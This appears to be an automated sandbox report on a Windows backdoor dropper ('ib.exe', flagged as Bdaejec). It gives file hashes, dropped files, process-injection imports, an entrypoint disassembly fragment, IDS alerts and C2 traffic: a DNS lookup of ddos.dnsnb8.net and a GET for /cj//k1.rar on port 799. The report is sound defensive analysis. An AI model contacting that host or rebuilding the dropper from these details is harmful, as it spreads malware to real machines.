Entropy (8bit):	6.366489024805923
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdRyQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdRBGCq2iW7z
MD5:	ADE4558B7BB1AB42CCE6F92DF5F0DACC
SHA1:	BDD2C6CA67C7DAC5B5D503AE6BAF4BAE8AB9EC1D
SHA-256:	37EFED9E8B690025DE031132CDE63D6EA63C90BDB75AACE86E9738C155F4EC85
SHA-512:	CD31B1DCBFABB215AE2905884D03573F73BE3D4DEA6DF0D12CB3D5F1750AB0CBD3A81666709760B158AA658817CEE193B1A8A2552244559AF57B15C0D4BE8AFE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hjErac.exe_b65444b1671fa348e7a4bd9321329eb10a53_61410b6e_7b740b91-304c-499d-98da-40c0ab07024e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9871252983947759
Encrypted:	false
SSDEEP:	96:qtFSc0M4c3sShno7afzQXIDcQOc6McEQcw3v+HbHg/5ksS/YyNl1zWDUMsxzLOyu:eEhc3i0AI64j8/AmzuiFmZ24IO89
MD5:	70D0C689CC98EDE888BC9C50BA62EB03
SHA1:	35F21B354E77962EDE9E2984683C1555EB9FE003
SHA-256:	A7FBC4AD9A93B5FF88C771D4B72740E5DD430FF9A14754B74516A5CF23C9C3AA
SHA-512:	FD2AFC0577BF4C2231FB57DF601F9CA360214A9C379C055F468F47A0D66115D6ACB0B969AAC7E455309F2A797BDF6629B1EFFE2F2FB343E67AD37846F5441804
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.1.7.1.2.8.3.0.3.0.4.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.1.7.1.2.8.8.0.3.0.4.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.7.4.0.b.9.1.-.3.0.4.c.-.4.9.9.d.-.9.8.d.a.-.4.0.c.0.a.b.0.7.0.2.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.d.a.9.a.c.9.-.8.d.d.b.-.4.4.2.0.-.9.f.d.b.-.a.5.3.e.a.8.4.e.9.b.c.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.j.E.r.a.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.4.-.0.0.0.1.-.0.0.1.4.-.a.6.b.f.-.c.1.7.8.9.d.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.f.0.0.7.6.5.a.c.9.2.8.3.a.b.7.e.8.e.e.9.c.2.3.b.7.7.b.3.5.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.h.j.E.r.a.c...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DD7.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Oct 26 11:52:08 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	163402
Entropy (8bit):	1.8069575397620328
Encrypted:	false
SSDEEP:	384:/hR9PciBo0B99poD9tjpnvYG7AnsGYaNE9DgYUafJYXX+6WXpj:pR9UgB99pYfjpnvb7AnsSNEJjJYHgj
MD5:	73E332940C50638847DF70DCBA9FBDB9
SHA1:	E0B3E9C1DF4E758DE7B9ACC0580026CEC653575E
SHA-256:	D34829F21B28BE4FBC9A0B4522CA77E28E27CC684E55B317932F52402DE33899
SHA-512:	52E7D7F7EE2DDAAF9BC8795BE369FCEB2323579866052884F1FAC59CB07EE5ED396F6E18CAE7122780E3AD761851AC9AB07F429D91040E1E31B271A3B5883680
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g............t...............\|...........hQ..........T.......8...........T............;..bB.......... !...........#..............................................................................eJ.......#......GenuineIntel............T.......T......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F01.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8246
Entropy (8bit):	3.688493671033932
Encrypted:	false
SSDEEP:	192:R6l7wVeJWg6z6Yl36tgLgmfmkOWypDt89b8Ysfv/Um:R6lXJh6z6YV6tgLgmfmkOWF8Lfv5
MD5:	8440FEB51D5DCA44C511169C60D92641
SHA1:	A70BC7E1A982EC182F0BDFC0FC8BC7DF740EDF81
SHA-256:	5EA209652F54F9E4FE686EB12C22D5594413B0C8F6EE23AEAF83AB7E35F8BEAA
SHA-512:	40671E514815D9114A2A3F5B5F07DBB5E0CE092EDD1FE024D4DFEF7FEEC818AF2044D772AAC7D5B02A4AF20B5D6291E13EAB132A4D6FBD10F4C8206775668CF4
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F21.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.4366818069450495
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9o+clWpW8VYAPYm8M4JsCFVK+q8q1HgBgGid:uIjfxI7K+cU7V9SJW9H2gGid
MD5:	F2A76E36838923C94EE6E5D82A88DD6B
SHA1:	0B886FA28B724A0F58A6F1D3A7BDEF7F146A36FA
SHA-256:	AC7E74BB442C0BE855DF86638512F09EE5EB4533096CBDFEE2F467144C77C757
SHA-512:	E06E758ECDACB185259B887BAE4F0FB0609972D372E50F93B7E693F667E63BDF0A880043D9D4CE3A2921BD2645A8ADB78C91DFAC3E6DD9C4164C76EEE0E456B1
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560334" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\hjErac.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	foo.

C:\Users\user\AppData\Local\Temp\1F7369D7.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\hjErac.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\hjErac.exe

Download File

Process:	C:\Users\user\Desktop\ib.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Joe Sandbox View:	Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse Filename: biKy3nZEyJ.exe, Detection: malicious, Browse Filename: biKy3nZEyJ.exe, Detection: malicious, Browse Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse Filename: a4#Uff09.exe, Detection: malicious, Browse Filename: 1.0.0.2.exe, Detection: malicious, Browse Filename: log1.exe, Detection: malicious, Browse Filename: log2.exe, Detection: malicious, Browse Filename: 2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\hjErac.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465998607561621
Encrypted:	false
SSDEEP:	6144:HIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNhdwBCswSbn:oXD94+WlLZMM6YFHP+n
MD5:	2D74DA3E8895F55136297001C73F7D38
SHA1:	37327AD8459A6013EF4EA17501410E07F83E6424
SHA-256:	9DA04636E9049E84B95853956A4FD24CBF4C0586C77A6651E0C0D8D777A3C7C1
SHA-512:	AF12582680919F6EAB533B2C9DE8AF4CAF464B9FDA1118AA0EBBA93DF938DDF195E941608BD86CBFF810E699F99A77BA8A7A0009C8027FBE1CD91A1A457075B5
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr.Ly.'..............................................................................................................................................................................................................................................................................................................................................I.ZM........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.484841822206029
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ib.exe
File size:	37'376 bytes
MD5:	1913f1b56f94a777c0130ef6e358586f
SHA1:	b1bc6735532a06744d37245f172408f8c2f062b0
SHA256:	79757b669da7754fb0319e313a1c24b9c9e170b7815174ca55959eb3bbca43f3
SHA512:	b838ae8f592776e80c25e4e6280a6e778fa1a1073d62aea9bd6604bdf25248848a45c8589373a0dd978a6193b8ac454eadf53ebcf187dcaa1eb1308cb0a4799c
SSDEEP:	768:1LtEcKD6bLDnaJy+bDbM7fSqQGPL4vzZq2o9W7GsxBbPr:1LdugLjR+yfSJGCq2iW7z
TLSH:	A8F2ADB3FF818EE3C08951740676B7BBC17BA6302BA461D7D792482A0D691D2BD3641F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EC..+...+...+.......+.......+.../...+...(...+......+......+...*...+.$."...+.$.....+.$.)...+.Rich..+.................PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x409000
Entrypoint Section:	Hu
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6427DFAD [Sat Apr 1 07:39:25 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	6f770b1c9c60b3d313b72c1a3bde4335

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 72456A68h
mov dword ptr [ebp-44h], 652E6361h
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007F32F9799755h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFF9A51h
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F32F979989Eh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F32F97997A4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F32F979979Bh

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4ca8	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0x430	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x4460	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x43a0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4000	0x1b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2954	0x2a00	d3c81030df1ef822e29ecc6eeacb3a51	False	0.5792410714285714	data	6.177173611938834	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4000	0x1764	0x1800	4c2efc18cc96d0174f89696a5f623930	False	0.4231770833333333	data	4.76476561394463	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6000	0x570	0x200	08f9fe4694554cc5032a6182e6be54e2	False	0.41015625	data	4.312951008582929	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x7000	0x1e0	0x200	0b35de07beeb30d1d6013cbca2846303	False	0.525390625	data	4.701503258251789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0x430	0x600	dfc77dcd70cf1807a7169892e07b9868	False	0.63671875	data	5.299296196371604	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Hu	0x9000	0x5000	0x4200	64aed0e40be53821918cbf9e02397daa	False	0.77734375	data	6.93404046385773	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x7060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	Sleep, GetLastError, WaitForSingleObject, GetCurrentProcessId, CreateMutexA, GetModuleHandleA, OpenProcess, CloseHandle, GetProcAddress, VirtualAllocEx, CreateRemoteThread, K32GetProcessImageFileNameA, SuspendThread, ResumeThread, K32EnumProcessModulesEx, K32GetModuleFileNameExA, CreateThread, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetModuleHandleW, WriteProcessMemory
USER32.dll	SetCursorPos, GetSystemMetrics, GetWindowThreadProcessId, CallNextHookEx, SetWindowsHookExA, UnhookWindowsHookEx, TranslateMessage, PeekMessageA, keybd_event, MapVirtualKeyA, mouse_event, SendInput, MessageBoxA, PostQuitMessage, DispatchMessageA, GetForegroundWindow
SHLWAPI.dll	StrStrIA
MSVCP140.dll	?_Xlength_error@std@@YAXPBD@Z, ?_Xbad_function_call@std@@YAXXZ, _Thrd_detach, ?_Throw_Cpp_error@std@@YAXH@Z, ?_Throw_C_error@std@@YAXH@Z, _Cnd_do_broadcast_at_thread_exit
WS2_32.dll	recvfrom, setsockopt, WSAGetLastError, socket, sendto, WSAStartup, htons, inet_addr
VCRUNTIME140.dll	memset, _except_handler4_common, strstr, __current_exception_context, __CxxFrameHandler3, __std_exception_destroy, __std_exception_copy, _CxxThrowException, __current_exception
api-ms-win-crt-runtime-l1-1-0.dll	_controlfp_s, _seh_filter_exe, terminate, _beginthreadex, _register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___argv, __p___argc, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _initialize_onexit_table, _crt_atexit, _set_app_type, exit, _register_onexit_function
api-ms-win-crt-stdio-l1-1-0.dll	__acrt_iob_func, __p__commode, _set_fmode, __stdio_common_vfprintf
api-ms-win-crt-heap-l1-1-0.dll	_callnewh, free, malloc, _set_new_mode
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-26T13:52:03.656735+0200	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	1	192.168.2.4	59334	1.1.1.1	53	UDP
2024-10-26T13:52:04.339917+0200	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.4	49730	44.221.84.105	799	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 13:52:03.777404070 CEST	49730	799	192.168.2.4	44.221.84.105
Oct 26, 2024 13:52:03.783031940 CEST	799	49730	44.221.84.105	192.168.2.4
Oct 26, 2024 13:52:03.785768986 CEST	49730	799	192.168.2.4	44.221.84.105
Oct 26, 2024 13:52:03.786037922 CEST	49730	799	192.168.2.4	44.221.84.105
Oct 26, 2024 13:52:03.791631937 CEST	799	49730	44.221.84.105	192.168.2.4
Oct 26, 2024 13:52:04.339853048 CEST	799	49730	44.221.84.105	192.168.2.4
Oct 26, 2024 13:52:04.339916945 CEST	49730	799	192.168.2.4	44.221.84.105
Oct 26, 2024 13:52:04.371823072 CEST	799	49730	44.221.84.105	192.168.2.4
Oct 26, 2024 13:52:04.371886969 CEST	49730	799	192.168.2.4	44.221.84.105
Oct 26, 2024 13:52:04.373011112 CEST	49730	799	192.168.2.4	44.221.84.105
Oct 26, 2024 13:52:04.378297091 CEST	799	49730	44.221.84.105	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 13:52:03.656734943 CEST	59334	53	192.168.2.4	1.1.1.1
Oct 26, 2024 13:52:03.757278919 CEST	53	59334	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2024 13:52:03.656734943 CEST	192.168.2.4	1.1.1.1	0xa776	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 26, 2024 13:52:03.757278919 CEST	1.1.1.1	192.168.2.4	0xa776	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	44.221.84.105	799	6996	C:\Users\user\AppData\Local\Temp\hjErac.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 13:52:03.786037922 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	07:52:02
Start date:	26/10/2024
Path:	C:\Users\user\Desktop\ib.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ib.exe"
Imagebase:	0x3e0000
File size:	37'376 bytes
MD5 hash:	1913F1B56F94A777C0130EF6E358586F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	07:52:02
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:52:02
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\hjErac.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\hjErac.exe
Imagebase:	0xcb0000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:52:08
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428
Imagebase:	0xc70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	25.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	30.9%
Total number of Nodes:	376
Total number of Limit Nodes:	11

Executed Functions

Function 003E9044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 003E9223
WriteFile.KERNELBASE(00000000,FFFF9A51,00003E00,?,00000000), ref: 003E9252
CloseHandle.KERNELBASE(00000000), ref: 003E9256
WinExec.KERNEL32(?,00000005), ref: 003E9262

Strings

Kern, xrefs: 003E90F4
athA, xrefs: 003E9199
